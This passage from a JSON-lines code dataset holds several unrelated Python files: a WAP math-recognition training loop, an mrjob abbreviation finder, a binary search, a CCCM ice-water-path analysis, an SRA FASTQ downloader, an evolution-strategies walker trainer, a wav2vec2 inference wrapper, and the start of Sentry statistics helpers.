'valid.cer'), os.path.join(result_path, 'valid.exprate')]\n\n model_path = os.path.join(work_path, 'models', model_date)\n folder_exists(model_path, create_=True)\n saveto = os.path.join(model_path, 'WAP_params.pkl')\n last_saveto = os.path.join(model_path, 'WAP_params_last.pkl')\n\n # training settings\n if multi_gpu_flag:\n batch_Imagesize = 500000\n valid_batch_Imagesize = 500000\n batch_size = 24\n valid_batch_size = 24\n else:\n batch_Imagesize = 500000\n valid_batch_Imagesize = 500000\n batch_size = args.batch_size\n valid_batch_size = batch_size\n maxImagesize = 500000\n\n maxlen = args.maxlen\n max_epochs = args.max_epochs\n lrate = args.lrate\n my_eps = args.eps\n decay_c = args.decay_c\n clip_c = args.clip_c\n\n # early stop\n estop = False\n halfLrFlag = 0\n bad_counter = 0\n patience = 15\n validStart = 10\n finish_after = 100000000\n\n # model architecture\n params = {}\n params['n'] = 256\n params['m'] = 256\n params['dim_attention'] = 512\n params['D'] = 684\n params['K'] = args.K ## num class : 106\n\n params['Kre'] = args.Kre ## num relation\n params['mre'] = 256\n params['maxlen'] = maxlen\n\n params['growthRate'] = 24\n params['reduction'] = 0.5\n params['bottleneck'] = True\n params['use_dropout'] = True\n params['input_channels'] = 1\n\n params['ly_lambda'] = 1.\n params['ry_lambda'] = 0.1\n params['re_lambda'] = 1.\n params['rpos_lambda'] = 1.\n params['KL_lambda'] = 0.1\n\n # load dictionary\n worddicts = load_dict(dictionaries[0])\n print ('total chars',len(worddicts))\n worddicts_r = [None] * len(worddicts)\n for kk, vv in worddicts.items():\n worddicts_r[vv] = kk\n\n reworddicts = load_dict(dictionaries[1])\n print ('total relations',len(reworddicts))\n reworddicts_r = [None] * len(reworddicts)\n for kk, vv in reworddicts.items():\n reworddicts_r[vv] = kk\n\n train,train_uid_list = dataIterator(datasets[0], datasets[1], datasets[2], worddicts, reworddicts,\n batch_size=batch_size, batch_Imagesize=batch_Imagesize,maxlen=maxlen,maxImagesize=maxImagesize)\n valid,valid_uid_list = dataIterator(valid_datasets[0], valid_datasets[1], valid_datasets[2], worddicts, reworddicts,\n batch_size=valid_batch_size, batch_Imagesize=valid_batch_Imagesize,maxlen=maxlen,maxImagesize=maxImagesize)\n # display\n uidx = 0 # count batch\n lpred_loss_s = 0. # count loss\n rpred_loss_s = 0.\n repred_loss_s = 0.\n mem_loss_s = 0.\n KL_loss_s = 0.\n loss_s = 0.\n ud_s = 0 # time for training an epoch\n validFreq = -1\n saveFreq = -1\n sampleFreq = -1\n dispFreq = 100\n if validFreq == -1:\n validFreq = len(train)\n if saveFreq == -1:\n saveFreq = len(train)\n if sampleFreq == -1:\n sampleFreq = len(train)\n\n # initialize model\n WAP_model = Encoder_Decoder(params)\n if init_param_flag:\n WAP_model.apply(weight_init)\n if multi_gpu_flag:\n WAP_model = nn.DataParallel(WAP_model, device_ids=[0, 1, 2, 3])\n if reload_flag:\n reload_path = sorted(get_filenames(model_path, extensions=['WAP_params.pkl'], recursive_=True))[-1]\n WAP_model.load_state_dict(torch.load(reload_path, map_location=lambda storage,loc:storage))\n WAP_model.cuda()\n\n # print model's parameters\n model_params = WAP_model.named_parameters()\n for k, v in model_params:\n print(k)\n\n # loss function\n # criterion = torch.nn.CrossEntropyLoss(reduce=False)\n # optimizer\n optimizer = optim.Adadelta(WAP_model.parameters(), lr=lrate, eps=my_eps, weight_decay=decay_c)\n\n print('Optimization')\n\n # statistics\n history_errs = []\n\n for eidx in range(max_epochs):\n n_samples = 0\n ud_epoch = time.time()\n random.shuffle(train)\n for x, ly, ry, re, ma, lp, rp in train:\n WAP_model.train()\n ud_start = time.time()\n n_samples += len(x)\n uidx += 1\n x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp = \\\n prepare_data(params, x, ly, ry, re, ma, lp, rp)\n\n x = torch.from_numpy(x).cuda() # (batch,1,H,W)\n x_mask = torch.from_numpy(x_mask).cuda() # (batch,H,W)\n ly = torch.from_numpy(ly).cuda() # (seqs_y,batch)\n ly_mask = torch.from_numpy(ly_mask).cuda() # (seqs_y,batch)\n ry = torch.from_numpy(ry).cuda() # (seqs_y,batch)\n ry_mask = torch.from_numpy(ry_mask).cuda() # (seqs_y,batch)\n re = torch.from_numpy(re).cuda() # (seqs_y,batch)\n re_mask = torch.from_numpy(re_mask).cuda() # (seqs_y,batch)\n ma = torch.from_numpy(ma).cuda() # (batch,seqs_y,seqs_y)\n ma_mask = torch.from_numpy(ma_mask).cuda() # (batch,seqs_y,seqs_y)\n lp = torch.from_numpy(lp).cuda() # (seqs_y,batch)\n rp = torch.from_numpy(rp).cuda() # (seqs_y,batch)\n\n # permute for multi-GPU training\n # ly = ly.permute(1, 0)\n # ly_mask = ly_mask.permute(1, 0)\n # ry = ry.permute(1, 0)\n # ry_mask = ry_mask.permute(1, 0)\n # lp = lp.permute(1, 0)\n # rp = rp.permute(1, 0)\n\n # forward\n loss, lpred_loss, rpred_loss, repred_loss, mem_loss, KL_loss = \\\n WAP_model(params, x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp)\n\n # recover from permute\n lpred_loss_s += lpred_loss.item()\n rpred_loss_s += rpred_loss.item()\n repred_loss_s += repred_loss.item()\n mem_loss_s += mem_loss.item()\n KL_loss_s += KL_loss.item()\n loss_s += loss.item()\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n if clip_c > 0.:\n torch.nn.utils.clip_grad_norm_(WAP_model.parameters(), clip_c)\n\n # update\n optimizer.step()\n\n ud = time.time() - ud_start\n ud_s += ud\n\n # display\n if np.mod(uidx, dispFreq) == 0:\n ud_s /= 60.\n loss_s /= dispFreq\n lpred_loss_s /= dispFreq\n rpred_loss_s /= dispFreq\n repred_loss_s /= dispFreq\n mem_loss_s /= dispFreq\n KL_loss_s /= dispFreq\n print ('Epoch', eidx, ' Update', uidx, ' Cost_lpred %.7f, Cost_rpred %.7f, Cost_re %.7f, Cost_matt %.7f, Cost_kl %.7f' % \\\n (np.float(lpred_loss_s),np.float(rpred_loss_s),np.float(repred_loss_s),np.float(mem_loss_s),np.float(KL_loss_s)), \\\n ' UD %.3f' % ud_s, ' lrate', lrate, ' eps', my_eps, ' bad_counter', bad_counter)\n ud_s = 0\n loss_s = 0.\n lpred_loss_s = 0.\n rpred_loss_s = 0.\n repred_loss_s = 0.\n mem_loss_s = 0.\n KL_loss_s = 0.\n\n # validation\n if np.mod(uidx, sampleFreq) == 0 and eidx >= validStart:\n print('begin sampling')\n ud_epoch_train = (time.time() - ud_epoch) / 60.\n print('epoch training cost time ... ', ud_epoch_train)\n WAP_model.eval()\n valid_out_path = valid_output[0]\n valid_malpha_path = valid_output[1]\n if not os.path.exists(valid_out_path):\n os.mkdir(valid_out_path)\n if not os.path.exists(valid_malpha_path):\n os.mkdir(valid_malpha_path)\n rec_mat = {}\n label_mat = {}\n rec_re_mat = {}\n label_re_mat = {}\n rec_ridx_mat = {}\n label_ridx_mat = {}\n with torch.no_grad():\n valid_count_idx = 0\n for x, ly, ry, re, ma, lp, rp in valid:\n for xx, lyy, ree, rpp in zip(x, ly, re, rp):\n xx_pad = xx.astype(np.float32) / 255.\n xx_pad = torch.from_numpy(xx_pad[None, :, :, :]).cuda() # (1,1,H,W)\n score, sample, malpha_list, relation_sample = \\\n gen_sample(WAP_model, xx_pad, params, multi_gpu_flag, k=3, maxlen=maxlen, rpos_beam=3)\n\n key = valid_uid_list[valid_count_idx]\n rec_mat[key] = []\n label_mat[key] = lyy\n rec_re_mat[key] = []\n label_re_mat[key] = ree\n rec_ridx_mat[key] = []\n label_ridx_mat[key] = rpp\n if len(score) == 0:\n rec_mat[key].append(0)\n rec_re_mat[key].append(0) # End\n rec_ridx_mat[key].append(0)\n else:\n score = score / np.array([len(s) for s in sample])\n min_score_index = score.argmin()\n ss = sample[min_score_index]\n rs = relation_sample[min_score_index]\n mali = malpha_list[min_score_index]\n for i, [vv, rv] in enumerate(zip(ss, rs)):\n if vv == 0:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(0) # End\n break\n else:\n if i == 0:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(6) # Start\n else:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(rv)\n ma_idx_list = np.array(mali).astype(np.int64)\n ma_idx_list[-1] = int(len(ma_idx_list)-1)\n rec_ridx_mat[key] = ma_idx_list\n valid_count_idx=valid_count_idx+1\n\n print('valid set decode done')\n ud_epoch = (time.time() - ud_epoch) / 60.\n print('epoch cost time ... ', ud_epoch)\n\n if np.mod(uidx, saveFreq) == 0:\n print('Saving latest model params ... ')\n torch.save(WAP_model.state_dict(), last_saveto)\n\n # calculate wer and expRate\n if np.mod(uidx, validFreq) == 0 and eidx >= validStart:\n valid_cer_out = compute_wer(rec_mat, label_mat)\n valid_cer = 100. * valid_cer_out[0]\n valid_recer_out = compute_wer(rec_re_mat, label_re_mat)\n valid_recer = 100. * valid_recer_out[0]\n valid_ridxcer_out = compute_wer(rec_ridx_mat, label_ridx_mat)\n valid_ridxcer = 100. * valid_ridxcer_out[0]\n valid_exprate = compute_sacc(rec_mat, label_mat, rec_ridx_mat, label_ridx_mat, rec_re_mat, label_re_mat, worddicts_r, reworddicts_r)\n valid_exprate = 100. * valid_exprate\n valid_err=valid_cer+valid_ridxcer\n history_errs.append(valid_err)\n\n # the first time validation or better model\n if uidx // validFreq == 0 or valid_err <= np.array(history_errs).min():\n bad_counter = 0\n print('Saving best model params ... ')\n if multi_gpu_flag:\n torch.save(WAP_model.module.state_dict(), saveto)\n else:\n torch.save(WAP_model.state_dict(), saveto)\n\n # worse model\n if uidx / validFreq != 0 and valid_err > np.array(history_errs).min():\n bad_counter += 1\n if bad_counter > patience:\n if halfLrFlag == 2:\n print('Early Stop!')\n estop = True\n break\n else:\n print('Lr decay and retrain!')\n bad_counter = 0\n lrate = lrate / 10.\n params['KL_lambda'] = params['KL_lambda'] * 0.5\n for param_group in optimizer.param_groups:\n param_group['lr'] = lrate\n halfLrFlag += 1\n print ('Valid CER: %.2f%%, relation_CER: %.2f%%, rpos_CER: %.2f%%, ExpRate: %.2f%%' % (valid_cer,valid_recer,valid_ridxcer,valid_exprate))\n # finish after these many updates\n if uidx >= finish_after:\n print('Finishing after %d iterations!' % uidx)\n estop = True\n break\n\n print('Seen %d samples' % n_samples)\n\n # early stop\n if estop:\n break\n\n return True\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--dataset_type\", required=True, choices=['CROHME', '20K', 'MATHFLAT'], help=\"dataset type\")\n parser.add_argument(\"--concat_dataset_path\", type=str, help=\"Concated dataset path\")\n parser.add_argument(\"--train_path\", type=str, help=\"train data folder path\")\n parser.add_argument(\"--test_path\", type=str, help=\"test data folder path\")\n parser.add_argument(\"--multi_gpu_flag\", default=False, type=str2bool, help=\"whether use multi-GPUs\")\n parser.add_argument(\"--init_param_flag\", default=True, type=str2bool, help=\"whether init params\")\n parser.add_argument(\"--reload_flag\", default=False, type=str2bool, help=\"whether reload params\") ## True\n parser.add_argument('--batch_size', type=int, default=8, help='input batch size') ## 2\n parser.add_argument('--maxlen', type=int, default=200, help='maximum-label-length')\n parser.add_argument('--max_epochs', type=int, default=5000, help='maximum-data-epoch')\n parser.add_argument('--lrate', type=float, default=1.0, help='learning rate, default=1.0 for Adadelta')\n parser.add_argument('--eps', type=float, default=1e-6, help='eps for Adadelta. default=1e-6')\n parser.add_argument('--decay_c', type=float, default=1e-4, help='decay-c')\n parser.add_argument('--clip_c', type=float, default=100.0, help='clip-c')\n\n parser.add_argument(\"--estop\", default=False, type=str2bool, help=\"whether use early stop\")\n\n \"\"\" Model Architecture \"\"\"\n parser.add_argument('--K', type=int, default=106, help='number of character label') # 112\n parser.add_argument('--Kre', type=int, default=8, help='number of character relation')\n\n args = parser.parse_args(argv)\n\n return args\n\n\nSELF_TEST_ = True\nDATASET_TYPE = 'MATHFLAT' # CROHME / 20K / MATHFLAT\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n if SELF_TEST_:\n sys.argv.extend([\"--dataset_type\", DATASET_TYPE])\n # sys.argv.extend([\"--reload_flag\", 'True'])\n # sys.argv.extend([\"--batch_size\", '2'])\n # sys.argv.extend([\"--K\", '112'])\n else:\n sys.argv.extend([\"--help\"])\n\n main(parse_arguments(sys.argv[1:]))","sub_path":"codes/train_wap.py","file_name":"train_wap.py","file_ext":"py","file_size_in_byte":18354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561758830","text":"from mrjob.job import MRJob\nfrom mrjob.protocol import TextProtocol\nimport re\n\n\nclass MRAbbreviationFinder(MRJob):\n\n OUTPUT_PROTOCOL = TextProtocol\n PATTERN_RE = re.compile(r'(?: |^)\\w+\\.[,;:?!]?(?: |$)\\w?')\n ABBR_RE = re.compile(r\"\\w+\\.\")\n PROB_THRESH = 0.7\n\n def mapper(self, _, line):\n for match in self.PATTERN_RE.findall(line):\n if isinstance(match, str):\n for abbr in self.ABBR_RE.findall(match):\n if isinstance(abbr, str):\n yield abbr.lower(), match[-1].islower()\n\n def reducer(self, word, counters):\n total, lower = 0, 0\n for counter in counters:\n if counter:\n lower += 1\n total += 1\n if self.PROB_THRESH < lower/total and total > 25 :\n yield word, str((total, lower))\n\n\nif __name__ == \"__main__\":\n MRAbbreviationFinder.run()","sub_path":"code/task2_5.py","file_name":"task2_5.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26676867","text":"def binary_search(lst, search_item):\n low = 0\n high = len(lst) - 1\n search_res = False\n\n while low <= high and not search_res:\n middle = (low + high) // 2\n guess = lst[middle]\n if guess == search_item:\n search_res = True\n if guess > search_item:\n high = middle - 1\n else:\n low = middle + 1\n return search_res\n\n\nlst = [3, 5, 11, 12, 15, 23, 25, 34, 67, 86]\nvalue = 67\nresult = binary_search(lst, value)\nif result:\n print(\"Элемент найден!\")\nelse:\n print(\"Элемент не найден.\")\n","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185626092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 5 09:26:33 2019\n\n@author: Tristan O'Hanlon\n\nThis will create a datasset of specific cloud ice water content (kgm^-2) with latitude.\nData is stored in a 2D array cccm_tciw_lat \n[:,0] = latitude\n[:,1] = IWP\n\"\"\"\nimport time\nimport numpy as np\nfrom scipy import integrate\nfrom sklearn.impute import SimpleImputer\nimport os\nfrom pyhdf import SD\nimport matplotlib.pyplot as plt\nimport h5py\n\n#---get altitude in km---#\nos.chdir('E:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets') #Home PC\nf = h5py.File('2006_CCCM_profile_variables.h5', 'r')\n\nlat = f['lat'][:]\nalt = f['alt'][:]\ncff = f['cff'][:]\n\nalt = alt*1000\n\n#------------------------#\n\ntciw = [] # create a blank array to add cloud ice water content data\n\nos.chdir('E:/University/University/MSc/Models/Data/CCCM/2006') # Home PC\n\nstart = time.time()\n# Load every file in the directory\nfor filename in os.listdir(): \n \n # Load the file\n f = SD.SD(filename)\n # Get the cloud ice water content data as a list. (25536, 137) 'units': 'grams per cubic meter'\n tciw = tciw+f.select('Ice water content profile used').get().tolist() #same as profile plots\n \nif len(lat) != len(tciw):\n exit('Invalid sizes of lat and tciw data')\n \nend = time.time()\nprint('Importing data from files to lists took:', end - start, 's')\n\ntciw = np.array(tciw)\n\n#Set the large 'fill values' in the data to nan before averaging \ntciw[tciw > 20] = np.nan\n\n####################\n\n#fit all nan values to average\n\nimp = SimpleImputer(missing_values=np.nan, strategy='mean')\nimp.fit(np.transpose(tciw)) \na = imp.transform(np.transpose(tciw))\ntciw = np.transpose(a)\n\n####################\n#computing the total cloud liquid water cloud content (LWP) kgm^-2\n\ns_tciw = integrate.trapz(tciw, alt) # integrate across total altitude\na_tciw = -s_tciw / 1000 #convert g to kg\n\n\n# Join the two lists as if they were two columns side by side, into a list of two elements each\ncombined = np.vstack((lat, a_tciw)).T\n#print (\"combined\")\n#print (combined)\n\n#print(\"get unique lats\")\nunique = np.unique(lat)\n#print(unique)\n\n# Add a column for every additional column, -1 will sort by the first column\ncombined = combined[np.lexsort(np.transpose(combined)[:-1])]\n#print (\"sorted\")\n#print (combined)\n\n# Averages of (lat, cloud ice water content) empty array\naverages_total = unique.size\ncccm_tciw_lat = np.empty((averages_total,2),dtype=float)\n\n# Current subtotal of current lat\nsubtotal = 0.0\n# Current number of cloud ice water content entries in subtotal\nnumber = 0\n# Set the current lat to false\ncurrent_lat = None\n\n# Iterate through all of the (lat, cloud ice water content) elements and subtotal the same lat values\ni = 0\nfor item in combined:\n \n if np.isnan(item[1]):\n continue\n\n if current_lat is None:\n \"\"\"\n print(\"setting current_lat to item[0]\")\n print(\"(current_lat == item[0]) = \", end='')\n print(current_lat == item[0]) \n \"\"\"\n current_lat = item[0];\n \n # If the lat is not the same as last time, then perform the average calc and reset everything\n if item[0] != current_lat:\n \n # Find the average value.\n average = subtotal / number\n \"\"\"\n print(\"--------\")\n print(\"lat: \", end='')\n print(current_lat, end='')\n print(\", avg: \", end='')\n print(average, end='')\n print(\", subtotal: \", end='')\n print(subtotal, end='')\n print(\", number: \", end='')\n print(number)\n \"\"\"\n # Append the average\n cccm_tciw_lat[i] = [current_lat, average]\n # Reset the subtotal\n subtotal = 0.0\n number = 0\n # Set the current latitude\n current_lat = item[0]\n # Move to the next index in the averages array\n i+=1\n\n # Add the next value to the subtotal\n number+=1\n subtotal+=item[1]\n \n# Catch the last entry in the for loop\naverage = subtotal / number\ncccm_tciw_lat[i] = [current_lat, average]\n\n\"\"\"\nprint (\"averages\")\n# Iterate through all of the (lat,cloud ice water content) elements\nfor item in averages:\n print(\"[\", end='')\n print(item[0], end='')\n print(\", \", end='')\n print(item[1], end='')\n print(\"]\\n\", end='')\n\"\"\"\n\ncccm_tciw_lat = cccm_tciw_lat[:,1]*cff\ncccm_tciw_lat = np.vstack((unique,cccm_tciw_lat)).T\n \nplt.figure()\nfig, ax = plt.subplots()\n#ax.plot(cccm_tciw_frac_lat[:,0],cccm_tciw_frac_lat[:,1], 'g', label='CCCM')\nax.plot(cccm_tciw_lat[:,0],cccm_tciw_lat[:,1], 'g', label='CCCM')\nax.legend(loc='lower center', bbox_to_anchor=(0.5, -0.3),\n ncol=4, fancybox=True, shadow=True);\n\n#ax.set_ylabel('Cloud Ice Water Content Fraction', color='r') \nax.set_ylabel('Cloud Ice Water Content kg$m^{-2}$', color='r')\nax.set_xlabel('Latitude')\n\nplt.title('IWP vs Latitude - 2006')\nplt.show()\n\n\n#import h5py\n\nos.chdir('E:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets')\n# specify path and file name to create \nwith h5py.File('2006_CCCM_tciw_lata.h5', 'w') as p:\n p.create_dataset('tciw', data=cccm_tciw_lat)\n p.close()\n","sub_path":"old_scripts/CCCM/old_scripts/Retired 28.6.2019/2006_CCCM_lat_tciw.py","file_name":"2006_CCCM_lat_tciw.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203857826","text":"#! /usr/bin/env python\n\"\"\"\nParallely downloads and converts NCBI .sra files to FASTQ\n\"\"\"\n\nimport argparse\nimport multiprocessing\nimport os\nimport sys\n\n\n#from pathlib import Path\ndef parseCommandLineArguments():\n \"\"\"\n Parses the arguments provided through command line.\n Launch python download_and_dump_fastq_from_SRA.py --help for more details\n \"\"\"\n parser = argparse.ArgumentParser(prog=\"download_and_dump_fastq_from_SRA.py\",\n description=\"\"\"Parallel download of fastq data from NCBI. \n Program will create the output directory if it is not present. \n If fastq file is present, then downloading is skipped. \n Program optimizes downloading of sra files and converting to fastq by utilizing multiple CPU cores. \n \"\"\")\n parser.add_argument(\"--sra\",\"-s\",help=\"Please enter the name of the file which has all the SRA ids listed one per line. Please note the bioproject IDS cannot be processed\",required=True)\n parser.add_argument(\"--output\",\"-o\",help=\"Please enter the name of the output directory. Download will be skipped if file is present\",required=True)\n parser.add_argument(\"--cpu\",\"-n\",help=\"Enter the number of CPUs to be used.\",default=1)\n return parser.parse_args()\n\ndef readSRAfilesToBeDownloaded(filename):\n \"\"\"\n Reads and returns a list of the SRA ids to be downloaded\n \"\"\"\n return list(set([name.strip() for name in open(filename,\"r\").read().split(\"\\n\")]))\n\ndef downloadSRAFile(allinput):\n sra,default_path_to_download,output_directory=allinput\n os.system(\"prefetch -X 104857600 -O \"+output_directory+\"/\"+\" \"+sra+\" 2> \"+output_directory+\"/\"+sra+\".error\")\n cmd=\"fastq-dump -X 1 -Z --split-spot \"+output_directory+\"/\"+sra+\".sra|wc -l > \"+output_directory+\"/\"+sra+\".temp\"\n os.system(cmd)\n if int(open(output_directory+\"/\"+sra+\".temp\").read())==4:\n pair=\"single\"\n else:\n pair=\"paired\"\n cmd=\"fastq-dump --defline-seq '@$sn[_$rn]/$ri' --outdir \"+output_directory+\" --split-files \"+output_directory+\"/\"+sra+\".sra\"\n os.system(cmd)\n if pair==\"single\":\n os.system(\"mv \"+output_directory+\"/\"+sra+\"_1.fastq \"+output_directory+\"/\"+sra+\".fastq \")\n os.system(\"rm \"+output_directory+\"/\"+sra+\".sra \"+output_directory+\"/\"+sra+\".temp\")\n \ndef downloadSRAFilesAndConvertToFastq(SRAs,default_path_to_download,n,output_directory):\n \"\"\"\n Downloads the sra files and converts to fastq\n \"\"\"\n cmd=\"mkdir -p \"+output_directory\n os.system(cmd)\n pool = multiprocessing.Pool(processes=int(n))\n allinputs=[]\n os.system(\"rm -rf \"+output_directory+\"/*lock\")\n os.system(\"rm -rf \"+output_directory+\"/*tmp\")\n os.system(\"rm -rf \"+output_directory+\"/*error\")\n os.system(\"rm -rf \"+output_directory+\"/*temp\")\n for sra in SRAs:\n if os.path.exists(output_directory+\"/\"+sra+\".fastq\")==True or (os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==True):\n if os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==False:\n os.system(\"mv \"+output_directory+\"/\"+sra+\"_1.fastq \"+output_directory+\"/\"+sra+\".fastq\")\n continue\n allinputs.append([sra,default_path_to_download,output_directory])\n pool.map(downloadSRAFile,allinputs)\n \ndef verifyOutput(output_directory,SRAs):\n \"\"\"\n Verify the downloads\n \"\"\"\n for sra in SRAs:\n if os.path.exists(output_directory+\"/\"+sra+\".fastq\")==True:\n continue\n elif os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==True:\n continue\n else:\n return 1\n return 0\n \ndef main():\n commandLineArg=sys.argv\n if len(commandLineArg)==1:\n print(\"Please use the --help option to get usage information\")\n options=parseCommandLineArguments()\n SRAs=readSRAfilesToBeDownloaded(options.sra)\n new_SRAs=[s for s in SRAs if s!=\"\"]\n SRAs=new_SRAs\n default_path_to_download=\"\"\n while verifyOutput(options.output,SRAs)==1:\n downloadSRAFilesAndConvertToFastq(SRAs,default_path_to_download,int(options.cpu),options.output)\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/downloadAndDumpFastqFromSRA.py","file_name":"downloadAndDumpFastqFromSRA.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233145208","text":"#############################\n\n\t# Working Evolution strategy No Library\n\n############################\n\n# Evolution Strategies BipedalWalker-v2\n# https://blog.openai.com/evolution-strategies/\n# gives good solution at around iter 100 in 5 minutes\n# for testing model set reload=True\n\nimport gym\nimport numpy as np\nimport cPickle as pickle\nimport sys\n\nenv = gym.make('Marvin-v0')\nnp.random.seed(10)\n\nhl_size = 100\nversion = 2\nnpop = 40\nsigma = 0.2\nalpha = 0.06\niter_num = 300\naver_reward = None\nallow_writing = True\nreload = False\n\n#print (env.reset())\n\n#print(hl_size, version, npop, sigma, alpha, iter_num)\n\nif reload:\n\tmodel = pickle.load(open('model-pedal%d.p' % version, 'rb'))\nelse:\n\tmodel = {}\n\tmodel['W1'] = np.random.randn(24, hl_size) / np.sqrt(24)\n\tmodel['W2'] = np.random.randn(hl_size, 4) / np.sqrt(hl_size)\n\n\t#print (\"MODEL: %s\" % model)\n\ndef get_action(state, model):\n\thl = np.matmul(state, model['W1'])\n\thl = np.tanh(hl)\n\taction = np.matmul(hl, model['W2'])\n\taction = np.tanh(action)\n\n\t#print (\"ACTION %s\" % (action))\n\n\treturn action\n\ndef f(model, render=False):\n\tstate = env.reset()\n\ttotal_reward = 0\n\tfor t in range(iter_num):\n\t\tif render: env.render()\n\n\t\taction = get_action(state, model)\n\t\tstate, reward, done, info = env.step(action)\n\t\ttotal_reward += reward\n\n\t\tif done:\n\t\t\tbreak\n\treturn total_reward\n\nif reload:\n\titer_num = 10000\n\tfor i_episode in range(10):\n\t\tf(model, True)\n\tsys.exit('demo finished')\n\nfor i in range(10001):\n\t#print (\"TRAINING???\")\n\tN = {}\n\tfor k, v in model.iteritems():\n\t\tN[k] = np.random.randn(npop, v.shape[0], v.shape[1])\n\t\t#print (\"K: %s V: %s\" % (k, v))\n\t\t#print (\"N[%s]: %s\" % (k, N[k]))\n\tR = np.zeros(npop)\n\t#print (\"NEXT ONE, PLEASE!!!\")\n\n\tfor j in range(npop):\n\t\tmodel_try = {}\n\t\tfor k, v in model.iteritems():\n\t\t\tprint (\"K is: %s\" % (k))\n\t\t\tmodel_try[k] = v + sigma*N[k][j]\n\t\tR[j] = f(model_try)\n\n\tA = (R - np.mean(R)) / np.std(R)\n\tfor k in model:\n\t\tmodel[k] = model[k] + alpha/(npop*sigma) * np.dot(N[k].transpose(1, 2, 0), A)\n\n\tcur_reward = f(model)\n\taver_reward = aver_reward * 0.9 + cur_reward * 0.1 if aver_reward != None else cur_reward\n\t#print('iter %d, cur_reward %.2f, aver_reward %.2f' % (i, cur_reward, aver_reward))\n\n\tif i % 10 == 0 and allow_writing:\n\t\t#print (\"Model is %s: \" % (model))\n\t\tpickle.dump(model, open('model-pedal%d.p' % version, 'wb'))","sub_path":"evo_nolib.py","file_name":"evo_nolib.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222280868","text":"import soundfile as sf\nimport torch\nfrom transformers import Wav2Vec2Processor, Wav2Vec2ForCTC\n\n# Improvements: \n# - gpu / cpu flag\n# - convert non 16 khz sample rates\n# - inference time log\n\nclass Wave2Vec2Inference():\n def __init__(self,model_name):\n self.processor = Wav2Vec2Processor.from_pretrained(model_name) \n self.model = Wav2Vec2ForCTC.from_pretrained(model_name)\n\n def buffer_to_text(self,audio_buffer):\n if(len(audio_buffer)==0):\n return \"\"\n\n inputs = self.processor([audio_buffer], sampling_rate=16_000, return_tensors=\"pt\", padding=True)\n\n with torch.no_grad():\n logits = self.model(inputs.input_values).logits\n\n predicted_ids = torch.argmax(logits, dim=-1) \n transcription = self.processor.batch_decode(predicted_ids)[0]\n return transcription.lower()\n\n def file_to_text(self,filename):\n audio_input, samplerate = sf.read(filename)\n assert samplerate == 16000\n return self.buffer_to_text(audio_input)\n\nif __name__ == \"__main__\":\n print(\"Model test\")\n asr = Wave2Vec2Inference(\"maxidl/wav2vec2-large-xlsr-german\")\n text = asr.file_to_text(\"test.wav\")\n print(text)","sub_path":"wav2vec2_inference.py","file_name":"wav2vec2_inference.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117312432","text":"import re\n\nimport requests\n\n\nSENTRY_STAT_PERIOD_DAY = '24h'\nSENTRY_STAT_PERIOD_FORTNIGHT = '14d'\n\n\ndef auth_token(token):\n def inner(request):\n request.headers['Authorization'] = 'Basic {}'.format(token)\n return request\n return inner\n\n\ndef stringify(value):\n try:\n return str(value)\n except UnicodeEncodeError:\n return repr(value)\n\n\ndef run_command(fct, cfg, issue, line):\n if not issue:\n return line, issue\n\n try:\n fct(cfg, issue)\n return line, issue\n except requests.exceptions.ConnectionError as e:\n return '{} --> ERROR, {}'.format(line, e), issue\n\n\ndef grouper(iterable, n):\n \"\"\"Collect data into fixed-length chunks or blocks\"\"\"\n block = []\n for index, item in enumerate(iterable, start=1):\n block.append(item)\n\n if index % n == 0:\n yield block\n block.clear()\n\n yield block\n\n\ndef confirm(message, accepted_values, default=None):\n confirmation = None\n while not confirmation or confirmation not in accepted_values:\n confirmation = input(message).lower() or default\n return confirmation\n\n\ndef decode_period(period):\n pattern = r'^(?P\\d+)(?P[hd])$'\n matched = re.search(pattern, period)\n if not matched:\n raise RuntimeError('Bad period format: %s, should be \\d+(h|d).' % period)\n\n data = matched.groupdict()\n unit = data['unit']\n value = int(data['value'])\n\n assert unit == 'd' or value <= 12, '12h is the maximum available period.'\n assert unit == 'h' or value <= 7, '7d is the maximum available period.'\n\n return (\n SENTRY_STAT_PERIOD_DAY if unit == 'd' else SENTRY_STAT_PERIOD_FORTNIGHT,\n value if unit == 'd' else 0,\n value if unit == 'h' else 0,\n )\n\n\ndef compute_events_stats(stats_period, period_length, threshold, issue):\n occurrences = issue['stats'][stats_period]\n latest_index = 24 if stats_period == SENTRY_STAT_PERIOD_DAY else 12\n\n current_count = sum([occurrences[t][1] for t in range(latest_index - period_length, latest_index)])\n old_count = 